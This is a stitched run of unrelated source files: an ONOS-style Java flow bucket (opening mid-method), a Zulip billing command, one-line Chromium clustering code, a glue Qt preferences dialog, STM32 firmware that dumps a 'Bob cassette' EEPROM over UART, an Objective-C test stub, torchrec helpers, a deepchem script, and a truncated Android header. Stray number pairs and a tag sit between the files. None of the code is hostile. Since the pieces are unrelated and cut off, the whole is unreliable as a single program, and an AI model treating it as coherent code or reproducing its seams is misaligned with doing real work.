     * Removes the given flow rule from the bucket.
     *
     * @param rule the rule to remove
     * @param term the term in which the change occurred
     * @param clock the logical clock
     * @return the removed flow entry
     */
    public FlowEntry remove(FlowEntry rule, long term, LogicalClock clock) {
        final AtomicReference<FlowEntry> removedRule = new AtomicReference<>();
        flowBucket.computeIfPresent(rule.id(), (flowId, flowEntries) -> {
            flowEntries.computeIfPresent((StoredFlowEntry) rule, (k, stored) -> {
                if (rule instanceof DefaultFlowEntry) {
                    DefaultFlowEntry toRemove = (DefaultFlowEntry) rule;
                    if (stored instanceof DefaultFlowEntry) {
                        DefaultFlowEntry storedEntry = (DefaultFlowEntry) stored;
                        if (toRemove.created() < storedEntry.created()) {
                            LOGGER.debug("Trying to remove more recent flow entry {} (stored: {})", toRemove, stored);
                            // the key is not updated, removedRule remains null
                            return stored;
                        }
                    }
                }
                removedRule.set(stored);
                // Returning null removes the mapping.
                return null;
            });
            // Drop the per-flow map entirely once its last entry is gone.
            return flowEntries.isEmpty() ? null : flowEntries;
        });

        if (removedRule.get() != null) {
            recordUpdate(term, clock.getTimestamp());
            return removedRule.get();
        } else {
            return null;
        }
    }

    /**
     * Purges the bucket.
     */
    public void purge() {
        flowBucket.clear();
    }

    /**
     * Purge the entries with the given application ID.
     *
     * @param appId the application ID
     * @param term the term in which the purge occurred
     * @param clock the logical clock
     */
    public void purge(ApplicationId appId, long term, LogicalClock clock) {
        boolean anythingRemoved = flowBucket.values().removeIf(flowEntryMap -> {
            flowEntryMap.values().removeIf(storedFlowEntry ->
                storedFlowEntry.appId() == appId.id());
            return flowEntryMap.isEmpty();
        });
        if (anythingRemoved) {
            recordUpdate(term, clock.getTimestamp());
        }
    }

    /**
     * Clears the bucket.
     */
    public void clear() {
        term = 0;
        timestamp = new LogicalTimestamp(0);
        flowBucket.clear();
    }
}
4,210
17,004
from typing import Any

from django.conf import settings
from django.core.management.base import CommandError, CommandParser

from zerver.lib.management import ZulipBaseCommand

# Billing code lives in the proprietary `corporate` app; only import it when
# billing is enabled so self-hosted installs without that app still load.
if settings.BILLING_ENABLED:
    from corporate.lib.stripe import switch_realm_from_standard_to_plus_plan


class Command(ZulipBaseCommand):
    """Management command: switch a realm from the Standard plan to Plus.

    No-op (beyond the realm lookup) when BILLING_ENABLED is off.
    """

    def add_arguments(self, parser: CommandParser) -> None:
        # Adds the standard --realm/-r selector from ZulipBaseCommand.
        self.add_realm_args(parser)

    def handle(self, *args: Any, **options: Any) -> None:
        realm = self.get_realm(options)
        if not realm:
            raise CommandError("No realm found.")

        if settings.BILLING_ENABLED:
            switch_realm_from_standard_to_plus_plan(realm)
254
14,668
<gh_stars>1000+ // Copyright 2021 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include "components/history_clusters/core/clusterer.h" #include "base/strings/utf_string_conversions.h" #include "components/history/core/browser/history_types.h" #include "components/history_clusters/core/on_device_clustering_features.h" namespace history_clusters { namespace { void AddKeywordsForVisitToCluster(history::Cluster& cluster, const history::ClusterVisit& visit) { base::flat_set<std::u16string> keywords_set(cluster.keywords.begin(), cluster.keywords.end()); for (const auto& entity : visit.annotated_visit.content_annotations.model_annotations.entities) { keywords_set.insert(base::UTF8ToUTF16(entity.id)); } for (const auto& category : visit.annotated_visit.content_annotations.model_annotations.categories) { keywords_set.insert(base::UTF8ToUTF16(category.id)); } cluster.keywords = std::vector<std::u16string>(keywords_set.begin(), keywords_set.end()); } } // namespace Clusterer::Clusterer() = default; Clusterer::~Clusterer() = default; std::vector<history::Cluster> Clusterer::CreateInitialClustersFromVisits( const std::vector<history::ClusterVisit>& visits) { // Sort visits by visit ID. std::vector<history::ClusterVisit> sorted_visits(visits.size()); std::partial_sort_copy( visits.begin(), visits.end(), sorted_visits.begin(), sorted_visits.end(), [](const history::ClusterVisit& a, const history::ClusterVisit& b) { return a.annotated_visit.visit_row.visit_id < b.annotated_visit.visit_row.visit_id; }); base::flat_map<GURL, size_t> url_to_cluster_map; base::flat_map<history::VisitID, size_t> visit_id_to_cluster_map; std::vector<history::Cluster> clusters; for (const auto& visit : sorted_visits) { auto visit_url = visit.normalized_url; absl::optional<size_t> cluster_idx; history::VisitID previous_visit_id = (visit.annotated_visit.referring_visit_of_redirect_chain_start != 0) ? 
visit.annotated_visit.referring_visit_of_redirect_chain_start : visit.annotated_visit.opener_visit_of_redirect_chain_start; if (previous_visit_id != 0) { // See if we have clustered the referring visit. auto it = visit_id_to_cluster_map.find(previous_visit_id); if (it != visit_id_to_cluster_map.end()) { cluster_idx = it->second; } } else { // See if we have clustered the URL. (forward-back, reload, etc.) auto it = url_to_cluster_map.find(visit_url); if (it != url_to_cluster_map.end()) { cluster_idx = it->second; } } DCHECK(!cluster_idx || (*cluster_idx < clusters.size())); // Even if above conditions were met, add it to a new cluster if the last // visit in the cluster's navigation time exceeds a certain duration. if (cluster_idx) { auto in_progress_cluster = clusters[*cluster_idx]; auto last_visit_nav_time = in_progress_cluster.visits.back() .annotated_visit.visit_row.visit_time; if ((visit.annotated_visit.visit_row.visit_time - last_visit_nav_time) > features::ClusterNavigationTimeCutoff()) { // Erase all visits in the cluster from the maps since we no longer // want to consider anything in the cluster as a referrer. auto finalized_cluster = clusters[*cluster_idx]; for (const auto& visit : finalized_cluster.visits) { visit_id_to_cluster_map.erase( visit.annotated_visit.visit_row.visit_id); url_to_cluster_map.erase(visit_url); } // Reset the working cluster index so we start a new cluster for this // visit. cluster_idx = absl::nullopt; } } // By default, the current visit will be assigned a max score of 1.0 until // otherwise scored during finalization. history::ClusterVisit default_scored_visit = visit; default_scored_visit.score = 1.0; if (cluster_idx) { clusters[*cluster_idx].visits.push_back(default_scored_visit); AddKeywordsForVisitToCluster(clusters[*cluster_idx], default_scored_visit); } else { // Add to new cluster. 
cluster_idx = clusters.size(); history::Cluster new_cluster; new_cluster.visits = {default_scored_visit}; AddKeywordsForVisitToCluster(new_cluster, default_scored_visit); clusters.push_back(std::move(new_cluster)); } visit_id_to_cluster_map[visit.annotated_visit.visit_row.visit_id] = *cluster_idx; url_to_cluster_map[visit_url] = *cluster_idx; } return clusters; } } // namespace history_clusters
2,035
550
"""Qt preferences dialog for glue: appearance/theme settings, autolinking
behavior, and plugin-contributed preference panes."""

import os
import weakref
import platform
from collections import OrderedDict

import numpy as np

from matplotlib.colors import ColorConverter

from qtpy import QtWidgets

from glue.core.message import SettingsChangeMessage
from glue.utils.qt import load_ui, ColorProperty, get_qapp
from glue.utils.qt.widget_properties import (CurrentComboTextProperty,
                                             ValueProperty, ButtonProperty)
from glue._settings_helpers import save_settings

__all__ = ["PreferencesDialog"]

# Converts any matplotlib color spec to an (r, g, b) tuple; used for theme
# detection below.
rgb = ColorConverter().to_rgb

# Maps the stored autolink-setting key to its human-readable combo label.
AUTOLINK_OPTIONS = OrderedDict([
    ('always_show', 'Always show suggestions'),
    ('always_accept', 'Always accept suggestions'),
    ('always_ignore', 'Always ignore suggestions')
])


class AutolinkPreferencesPane(QtWidgets.QWidget):
    """Preference pane with one combo box per registered autolinker,
    letting the user choose how link suggestions are handled."""

    def __init__(self, parent=None):
        super(AutolinkPreferencesPane, self).__init__(parent=parent)

        # Imported here (not at module level) to avoid triggering glue's
        # config machinery at import time.
        from glue.config import settings, autolinker  # noqa

        layout = QtWidgets.QGridLayout()

        # label -> QComboBox, read back in finalize().
        self.combos = {}

        if len(autolinker) > 0:
            for i, (label, _) in enumerate(autolinker):
                combo = QtWidgets.QComboBox()
                for short, display in AUTOLINK_OPTIONS.items():
                    # Display text shown to the user; userData holds the key
                    # stored in settings.
                    combo.addItem(display, userData=short)
                if label in settings.AUTOLINK:
                    index = list(AUTOLINK_OPTIONS.keys()).index(settings.AUTOLINK[label])
                else:
                    # Default to the first option ('always_show').
                    index = 0
                combo.setCurrentIndex(index)
                layout.addWidget(QtWidgets.QLabel(label), i, 0)
                layout.addWidget(combo, i, 1)
                self.combos[label] = combo
            # Spacer row below the last combo.
            layout.addWidget(QtWidgets.QWidget(), i + 1, 0)

        self.setLayout(layout)

    def finalize(self):
        """Persist the selected autolink behavior for each autolinker."""
        from glue.config import settings
        for label, combo in self.combos.items():
            settings.AUTOLINK[label] = combo.currentData()


class PreferencesDialog(QtWidgets.QDialog):
    """Main glue preferences dialog.

    The class-level descriptors below bind attribute access to widgets in
    ``preferences.ui``, so e.g. ``self.background`` reads/writes the color
    swatch widget directly.
    """

    theme = CurrentComboTextProperty('ui.combo_theme')
    background = ColorProperty('ui.color_background')
    foreground = ColorProperty('ui.color_foreground')
    data_color = ColorProperty('ui.color_default_data')
    data_alpha = ValueProperty('ui.slider_alpha', value_range=(0, 1))
    data_apply = ButtonProperty('ui.checkbox_apply')
    save_to_disk = ButtonProperty('ui.checkbox_save')
    font_size = ValueProperty('ui.spinner_font_size')

    def __init__(self, application, parent=None):

        super(PreferencesDialog, self).__init__(parent=parent)

        # Weak reference so the dialog does not keep the application alive.
        self._app = weakref.ref(application)

        self.ui = load_ui('preferences.ui', self,
                          directory=os.path.dirname(__file__))

        self.ui.cancel.clicked.connect(self.reject)
        self.ui.ok.clicked.connect(self.accept)

        self.ui.combo_theme.currentIndexChanged.connect(self._update_colors_from_theme)
        self.ui.button_reset_dialogs.clicked.connect(self._reset_dialogs)

        # The following is needed because of a bug in Qt which means that
        # tab titles don't get scaled right.
        if platform.system() == 'Darwin':
            app = get_qapp()
            app_font = app.font()
            self.ui.tab_widget.setStyleSheet('font-size: {0}px'.format(app_font.pointSize()))

        # Populate the widgets from the current settings.
        from glue.config import settings
        self.background = settings.BACKGROUND_COLOR
        self.foreground = settings.FOREGROUND_COLOR
        self.data_color = settings.DATA_COLOR
        self.data_alpha = settings.DATA_ALPHA
        self.font_size = settings.FONT_SIZE

        self._update_theme_from_colors()

        self._autolink_pane = AutolinkPreferencesPane()
        self.ui.tab_widget.addTab(self._autolink_pane, 'Autolinking')

        # Plugin-contributed panes; each must provide finalize().
        self.panes = []

        from glue.config import preference_panes
        for label, widget_cls in sorted(preference_panes):
            pane = widget_cls()
            self.ui.tab_widget.addTab(pane, label)
            self.panes.append(pane)

    def _update_theme_from_colors(self, *args):
        # Select the named theme matching the current colors, else 'Custom'.
        if (rgb(self.background) == (1, 1, 1) and
                rgb(self.foreground) == (0, 0, 0) and
                rgb(self.data_color) == (0.35, 0.35, 0.35) and
                np.allclose(self.data_alpha, 0.8)):
            self.theme = 'Black on White'
        elif (rgb(self.background) == (0, 0, 0) and
                rgb(self.foreground) == (1, 1, 1) and
                rgb(self.data_color) == (0.75, 0.75, 0.75) and
                np.allclose(self.data_alpha, 0.8)):
            self.theme = 'White on Black'
        else:
            self.theme = 'Custom'

    def _update_colors_from_theme(self, *args):
        # Apply the preset colors for the selected theme; 'Custom' leaves the
        # current colors untouched.
        if self.theme == 'Black on White':
            self.foreground = 'black'
            self.background = 'white'
            self.data_color = '0.35'
            self.data_alpha = 0.8
        elif self.theme == 'White on Black':
            self.foreground = 'white'
            self.background = 'black'
            self.data_color = '0.75'
            self.data_alpha = 0.8
        elif self.theme != 'Custom':
            raise ValueError("Unknown theme: {0}".format(self.theme))

    def _reset_dialogs(self, *args):
        # Re-enable all "show this dialog" style settings.
        from glue.config import settings
        for key, _, _ in settings:
            if key.lower().startswith(('show_info', 'show_warn', 'show_large')):
                setattr(settings, key, True)

    def accept(self):

        # Update default settings
        from glue.config import settings
        settings.FOREGROUND_COLOR = self.foreground
        settings.BACKGROUND_COLOR = self.background
        settings.DATA_COLOR = self.data_color
        settings.DATA_ALPHA = self.data_alpha
        settings.FONT_SIZE = self.font_size

        self._autolink_pane.finalize()
        for pane in self.panes:
            pane.finalize()

        # Save to disk if requested
        if self.save_to_disk:
            save_settings()
        else:
            # NOTE(review): sets the private flag on settings when *not*
            # saving — presumably to defer persistence; confirm intent
            # against glue's settings implementation.
            settings._save_to_disk = True

        # Trigger viewers to update defaults
        app = self._app()
        if app is not None:
            app._hub.broadcast(SettingsChangeMessage(self, ('FOREGROUND_COLOR', 'BACKGROUND_COLOR', 'FONT_SIZE')))
            if self.data_apply:
                # If requested, trigger data to update color
                app.set_data_color(settings.DATA_COLOR, settings.DATA_ALPHA)

        super(PreferencesDialog, self).accept()


if __name__ == "__main__":
    app = get_qapp()
    # NOTE(review): __init__ requires an `application` argument but none is
    # passed here — this demo path looks broken; verify before relying on it.
    widget = PreferencesDialog()
    widget.show()
    widget.raise_()
    app.exec_()
2,874
914
/** ****************************************************************************** * @file : main.c * @brief : Main program body ****************************************************************************** ** This notice applies to any and all portions of this file * that are not between comment pairs USER CODE BEGIN and * USER CODE END. Other portions of this file, whether * inserted by the user or by software development tools * are owned by their respective copyright owners. * * COPYRIGHT(c) 2021 STMicroelectronics * * Redistribution and use in source and binary forms, with or without modification, * are permitted provided that the following conditions are met: * 1. Redistributions of source code must retain the above copyright notice, * this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * 3. Neither the name of STMicroelectronics nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
  *
  ******************************************************************************
  */

/* Includes ------------------------------------------------------------------*/
#include "main.h"
#include "stm32f0xx_hal.h"

/* USER CODE BEGIN Includes */
#include <stdio.h>
#include <string.h>
#include "helpers.h"
#include "shared.h"
/* USER CODE END Includes */

/* Private variables ---------------------------------------------------------*/
I2C_HandleTypeDef hi2c1;    /* I2C1 handle: talks to the cassette EEPROM */
UART_HandleTypeDef huart2;  /* USART2 handle: printf/debug output */

/* USER CODE BEGIN PV */
/* Private variables ---------------------------------------------------------*/

/* USER CODE END PV */

/* Private function prototypes -----------------------------------------------*/
void SystemClock_Config(void);
static void MX_GPIO_Init(void);
static void MX_USART2_UART_Init(void);
static void MX_I2C1_Init(void);

/* USER CODE BEGIN PFP */
/* Private function prototypes -----------------------------------------------*/

/* USER CODE END PFP */

/* USER CODE BEGIN 0 */
/* Retarget printf() to USART2: blocking transmit, 100 ms timeout per char. */
int fputc(int ch, FILE *f)
{
  HAL_UART_Transmit(&huart2, (unsigned char *)&ch, 1, 100);
  return ch;
}

/* UART receive-complete callback; byte handling currently disabled. */
void HAL_UART_RxCpltCallback(UART_HandleTypeDef *huart)
{
	//linear_buf_add(&uart_lb, uart_byte_buf[0]);
  // printf("%c", uart_byte_buf[0]);
}
/* USER CODE END 0 */

/**
  * @brief  The application entry point.
  *
  * Waits until the Bob cassette EEPROM responds on I2C, dumps its entire
  * contents over UART as "bobdump <addr> <byte>" lines, then blinks the LED.
  *
  * @retval None
  */
int main(void)
{
  /* USER CODE BEGIN 1 */

  /* USER CODE END 1 */

  /* MCU Configuration----------------------------------------------------------*/

  /* Reset of all peripherals, Initializes the Flash interface and the Systick. */
  HAL_Init();

  /* USER CODE BEGIN Init */

  /* USER CODE END Init */

  /* Configure the system clock */
  SystemClock_Config();

  /* USER CODE BEGIN SysInit */

  /* USER CODE END SysInit */

  /* Initialize all configured peripherals */
  MX_GPIO_Init();
  MX_USART2_UART_Init();
  MX_I2C1_Init();
  /* USER CODE BEGIN 2 */
  HAL_Delay(500);
  printf("bobhack\n");
  /* Poll until the EEPROM ACKs its address.
     EEPROM_READ_ADDR / EEPROM_SIZE / eeprom_read() come from the project
     headers (helpers.h / shared.h) — assumed 7-bit HAL-style address. */
  while (1)
  {
    printf("Scanning I2C bus...\n");
    uint8_t scan_result = HAL_I2C_IsDeviceReady(&hi2c1, EEPROM_READ_ADDR, 1, 50);
    if(scan_result != 0)
      printf("EEPROM not found, retrying...\n");
    else
      break;
    HAL_Delay(500);
  }
  printf("Bob cassette found!\n");
  HAL_Delay(500);
  /* USER CODE END 2 */

  /* Infinite loop */
  /* USER CODE BEGIN WHILE */
  /* Dump every EEPROM byte as a "bobdump <index> <value>" line. */
  for (int i = 0; i < EEPROM_SIZE; i++)
  {
    uint8_t this_byte = eeprom_read(i);
    printf("bobdump %d %d\n", i, this_byte);
  }
  printf("done!\n");
  /* Done: blink the user LED forever at ~1 Hz. */
  while (1)
  {
    HAL_GPIO_TogglePin(USER_LED_GPIO_Port, USER_LED_Pin);
    HAL_Delay(500);
  /* USER CODE END WHILE */

  /* USER CODE BEGIN 3 */

  }
  /* USER CODE END 3 */

}

/**
  * @brief System Clock Configuration
  *
  * Runs the core from the 48 MHz internal oscillator (HSI48) with no
  * dividers; I2C1 is clocked from HSI.
  *
  * @retval None
  */
void SystemClock_Config(void)
{

  RCC_OscInitTypeDef RCC_OscInitStruct;
  RCC_ClkInitTypeDef RCC_ClkInitStruct;
  RCC_PeriphCLKInitTypeDef PeriphClkInit;

    /**Initializes the CPU, AHB and APB busses clocks
    */
  RCC_OscInitStruct.OscillatorType = RCC_OSCILLATORTYPE_HSI|RCC_OSCILLATORTYPE_HSI48;
  RCC_OscInitStruct.HSIState = RCC_HSI_ON;
  RCC_OscInitStruct.HSI48State = RCC_HSI48_ON;
  RCC_OscInitStruct.HSICalibrationValue = 16;
  RCC_OscInitStruct.PLL.PLLState = RCC_PLL_NONE;
  if (HAL_RCC_OscConfig(&RCC_OscInitStruct) != HAL_OK)
  {
    _Error_Handler(__FILE__, __LINE__);
  }

    /**Initializes the CPU, AHB and APB busses clocks
    */
  RCC_ClkInitStruct.ClockType = RCC_CLOCKTYPE_HCLK|RCC_CLOCKTYPE_SYSCLK
                              |RCC_CLOCKTYPE_PCLK1;
  RCC_ClkInitStruct.SYSCLKSource = RCC_SYSCLKSOURCE_HSI48;
  RCC_ClkInitStruct.AHBCLKDivider = RCC_SYSCLK_DIV1;
  RCC_ClkInitStruct.APB1CLKDivider = RCC_HCLK_DIV1;

  if (HAL_RCC_ClockConfig(&RCC_ClkInitStruct, FLASH_LATENCY_1) != HAL_OK)
  {
    _Error_Handler(__FILE__, __LINE__);
  }

  PeriphClkInit.PeriphClockSelection = RCC_PERIPHCLK_I2C1;
  PeriphClkInit.I2c1ClockSelection = RCC_I2C1CLKSOURCE_HSI;
  if (HAL_RCCEx_PeriphCLKConfig(&PeriphClkInit) != HAL_OK)
  {
    _Error_Handler(__FILE__, __LINE__);
  }

    /**Configure the Systick interrupt time
    */
  HAL_SYSTICK_Config(HAL_RCC_GetHCLKFreq()/1000);

    /**Configure the Systick
    */
  HAL_SYSTICK_CLKSourceConfig(SYSTICK_CLKSOURCE_HCLK);

  /* SysTick_IRQn interrupt configuration */
  HAL_NVIC_SetPriority(SysTick_IRQn, 0, 0);
}

/* I2C1 init function */
static void MX_I2C1_Init(void)
{

  hi2c1.Instance = I2C1;
  hi2c1.Init.Timing = 0x2000090E;  /* CubeMX-computed timing for HSI clock */
  hi2c1.Init.OwnAddress1 = 0;
  hi2c1.Init.AddressingMode = I2C_ADDRESSINGMODE_7BIT;
  hi2c1.Init.DualAddressMode = I2C_DUALADDRESS_DISABLE;
  hi2c1.Init.OwnAddress2 = 0;
  hi2c1.Init.OwnAddress2Masks = I2C_OA2_NOMASK;
  hi2c1.Init.GeneralCallMode = I2C_GENERALCALL_DISABLE;
  hi2c1.Init.NoStretchMode = I2C_NOSTRETCH_DISABLE;
  if (HAL_I2C_Init(&hi2c1) != HAL_OK)
  {
    _Error_Handler(__FILE__, __LINE__);
  }

    /**Configure Analogue filter
    */
  if (HAL_I2CEx_ConfigAnalogFilter(&hi2c1, I2C_ANALOGFILTER_ENABLE) != HAL_OK)
  {
    _Error_Handler(__FILE__, __LINE__);
  }

    /**Configure Digital filter
    */
  if (HAL_I2CEx_ConfigDigitalFilter(&hi2c1, 0) != HAL_OK)
  {
    _Error_Handler(__FILE__, __LINE__);
  }

}

/* USART2 init function */
static void MX_USART2_UART_Init(void)
{

  huart2.Instance = USART2;
  huart2.Init.BaudRate = 115200;
  huart2.Init.WordLength = UART_WORDLENGTH_8B;
  huart2.Init.StopBits = UART_STOPBITS_1;
  huart2.Init.Parity = UART_PARITY_NONE;
  huart2.Init.Mode = UART_MODE_TX_RX;
  huart2.Init.HwFlowCtl = UART_HWCONTROL_NONE;
  huart2.Init.OverSampling = UART_OVERSAMPLING_16;
  huart2.Init.OneBitSampling = UART_ONE_BIT_SAMPLE_DISABLE;
  huart2.AdvancedInit.AdvFeatureInit = UART_ADVFEATURE_NO_INIT;
  if (HAL_UART_Init(&huart2) != HAL_OK)
  {
    _Error_Handler(__FILE__, __LINE__);
  }

}

/** Configure pins as
        * Analog
        * Input
        * Output
        * EVENT_OUT
        * EXTI
*/
static void MX_GPIO_Init(void)
{

  GPIO_InitTypeDef GPIO_InitStruct;

  /* GPIO Ports Clock Enable */
  __HAL_RCC_GPIOB_CLK_ENABLE();
  __HAL_RCC_GPIOF_CLK_ENABLE();
  __HAL_RCC_GPIOA_CLK_ENABLE();

  /*Configure GPIO pin Output Level */
  HAL_GPIO_WritePin(USER_LED_GPIO_Port, USER_LED_Pin, GPIO_PIN_SET);

  /*Configure GPIO pin : USER_BUTTON_Pin */
  GPIO_InitStruct.Pin = USER_BUTTON_Pin;
  GPIO_InitStruct.Mode = GPIO_MODE_INPUT;
  GPIO_InitStruct.Pull = GPIO_NOPULL;
  HAL_GPIO_Init(USER_BUTTON_GPIO_Port, &GPIO_InitStruct);

  /*Configure GPIO pin : USER_LED_Pin */
  GPIO_InitStruct.Pin = USER_LED_Pin;
  GPIO_InitStruct.Mode = GPIO_MODE_OUTPUT_PP;
  GPIO_InitStruct.Pull = GPIO_NOPULL;
  GPIO_InitStruct.Speed = GPIO_SPEED_FREQ_LOW;
  HAL_GPIO_Init(USER_LED_GPIO_Port, &GPIO_InitStruct);

}

/* USER CODE BEGIN 4 */

/* USER CODE END 4 */

/**
  * @brief  This function is executed in case of error occurrence.
  * @param  file: The file name as string.
  * @param  line: The line in file as a number.
  * @retval None
  */
void _Error_Handler(char *file, int line)
{
  /* USER CODE BEGIN Error_Handler_Debug */
  /* User can add his own implementation to report the HAL error return state */
  while(1)
  {
  }
  /* USER CODE END Error_Handler_Debug */
}

#ifdef  USE_FULL_ASSERT
/**
  * @brief  Reports the name of the source file and the source line number
  *         where the assert_param error has occurred.
  * @param  file: pointer to the source file name
  * @param  line: assert_param error line source number
  * @retval None
  */
void assert_failed(uint8_t* file, uint32_t line)
{
  /* USER CODE BEGIN 6 */
  /* User can add his own implementation to report the file name and line number,
     tex: printf("Wrong parameters value: file %s on line %d\r\n", file, line) */
  /* USER CODE END 6 */
}
#endif /* USE_FULL_ASSERT */

/**
  * @}
  */

/**
  * @}
  */

/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/
3,783
392
#import <Foundation/Foundation.h>

// Test double mirroring the subset of ASIHTTPRequest used by the test suite.
// The stub_ prefix keeps these selectors from colliding with the real
// ASIHTTPRequest methods when swizzled/substituted in tests.
@interface ASIHTTPRequestStub : NSObject
// Canned HTTP status code to report.
- (int)stub_responseStatusCode;
// Canned response body.
- (NSData *)stub_responseData;
// Canned response headers.
- (NSDictionary *)stub_responseHeaders;
// Replacement for the real request's start method (no network I/O).
- (void)stub_startRequest;
@end
93
814
#!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.

from typing import Dict, List, Optional, Tuple

import torch
from torchrec.metrics.rec_metric import RecTaskInfo


def is_empty_signals(
    labels: torch.Tensor,
    predictions: torch.Tensor,
    weights: torch.Tensor,
) -> bool:
    """Return True when labels, predictions AND weights are all empty tensors."""
    return (
        torch.numel(labels) <= 0
        and torch.numel(predictions) <= 0
        and torch.numel(weights) <= 0
    )


def parse_model_outputs(
    label_name: str,
    prediction_name: str,
    weight_name: str,
    model_out: Dict[str, torch.Tensor],
) -> Tuple[torch.Tensor, Optional[torch.Tensor], Optional[torch.Tensor]]:
    """Extract (labels, predictions, weights) tensors from a model output dict.

    All tensors are squeezed. If ``prediction_name`` is empty, only labels are
    returned (predictions/weights come back as None). Non-empty signals are
    validated to have matching element counts and are promoted to rank 1.
    """
    labels = model_out[label_name].squeeze()
    if not prediction_name:
        # Label-only mode: a weight without a prediction is not meaningful.
        assert not weight_name, "weight name must be empty if prediction name is empty"
        return (labels, None, None)
    assert isinstance(labels, torch.Tensor)
    predictions = model_out[prediction_name].squeeze()
    assert isinstance(predictions, torch.Tensor)
    weights = model_out[weight_name].squeeze()
    assert isinstance(weights, torch.Tensor)

    # If the model output for the metric is empty, pass it forward
    # (mismatched element counts are only tolerated when everything is empty).
    if not (
        (torch.numel(labels) == torch.numel(predictions))
        and (torch.numel(labels) == torch.numel(weights))
    ):
        assert is_empty_signals(labels, predictions, weights)
    if not is_empty_signals(labels, predictions, weights):
        assert (torch.numel(labels) == torch.numel(predictions)) and (
            torch.numel(labels) == torch.numel(weights)
        ), (
            "Expect the same number of elements in labels, predictions, and weights. "
            f"Instead got {torch.numel(labels)}, {torch.numel(predictions)}, "
            f"{torch.numel(weights)}"
        )
        # non-empty tensors need to have rank 1
        # (squeeze() above reduces a single-element tensor to rank 0)
        if len(labels.size()) == 0:
            labels = labels.unsqueeze(0)
            predictions = predictions.unsqueeze(0)
            weights = weights.unsqueeze(0)
    return labels, predictions, weights


def parse_task_model_outputs(
    tasks: List[RecTaskInfo], model_out: Dict[str, torch.Tensor]
) -> Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor], Dict[str, torch.Tensor]]:
    """Collect per-task labels/predictions/weights keyed by task name.

    Tasks whose signals are empty are skipped entirely. Label-only tasks
    (no prediction/weight) contribute only to the labels dict, and only when
    the label tensor is non-empty.
    """
    all_labels: Dict[str, torch.Tensor] = {}
    all_predictions: Dict[str, torch.Tensor] = {}
    all_weights: Dict[str, torch.Tensor] = {}
    for task in tasks:
        labels, predictions, weights = parse_model_outputs(
            task.label_name, task.prediction_name, task.weight_name, model_out
        )
        if predictions is not None and weights is not None:
            if not is_empty_signals(labels, predictions, weights):
                all_labels[task.name] = labels
                all_predictions[task.name] = predictions
                all_weights[task.name] = weights
        else:
            if torch.numel(labels) > 0:
                all_labels[task.name] = labels
    return all_labels, all_predictions, all_weights
1,298
3,782
"""
Script that loads random forest models trained on the sider and tox21 datasets,
predicts on sweetlead, creates covariance matrix

@Author <NAME>
"""
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals

import os
import sys
import numpy as np
import pandas as pd
import deepchem as dc
from sklearn.ensemble import RandomForestClassifier
from deepchem.models.multitask import SingletaskToMultitask
from deepchem import metrics
from deepchem.metrics import Metric
from deepchem.models.sklearn_models import SklearnModel

# Load the Tox21 dataset (tasks + train/valid/test splits + transformers).
tox_tasks, (tox_train, tox_valid, tox_test), tox_transformers = dc.molnet.load_tox21()

classification_metric = Metric(
    metrics.roc_auc_score, np.mean, mode="classification")


def model_builder(model_dir):
    # One balanced random forest per task; wrapped for deepchem's API.
    sklearn_model = RandomForestClassifier(
        class_weight="balanced", n_estimators=500, n_jobs=-1)
    return dc.models.SklearnModel(sklearn_model, model_dir)


print(tox_train.get_task_names())
print(tox_tasks)
# Train one single-task model per Tox21 task.
tox_model = SingletaskToMultitask(tox_tasks, model_builder)
tox_model.fit(tox_train)

# Load sider models now
sider_tasks, (
    sider_train, sider_valid, sider_test), sider_transformers = dc.molnet.load_sider(split="random")

sider_model = SingletaskToMultitask(sider_tasks, model_builder)
sider_model.fit(sider_train)

# Load sweetlead dataset now. Pass in dataset object and appropriate
# transformers to predict functions
sweet_tasks, (sweet_dataset, _, _), sweet_transformers = dc.molnet.load_sweet()

sider_predictions = sider_model.predict(sweet_dataset, sweet_transformers)

tox_predictions = tox_model.predict(sweet_dataset, sweet_transformers)

sider_dimensions = sider_predictions.shape[1]
tox_dimensions = tox_predictions.shape[1]

# Co-occurrence counts: entry (j, k) counts compounds predicted positive for
# both tox task j and sider task k.
confusion_matrix = np.zeros(shape=(tox_dimensions, sider_dimensions))
for i in range(tox_predictions.shape[0]):
    nonzero_tox = np.nonzero(tox_predictions[i, :])
    nonzero_sider = np.nonzero(sider_predictions[i, :])
    for j in nonzero_tox[0]:
        for k in nonzero_sider[0]:
            confusion_matrix[j, k] += 1

df = pd.DataFrame(confusion_matrix)
df.to_csv("./tox_sider_matrix.csv")
796
831
/*
 * Copyright (C) 2016 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package com.android.tools.idea.explorer;

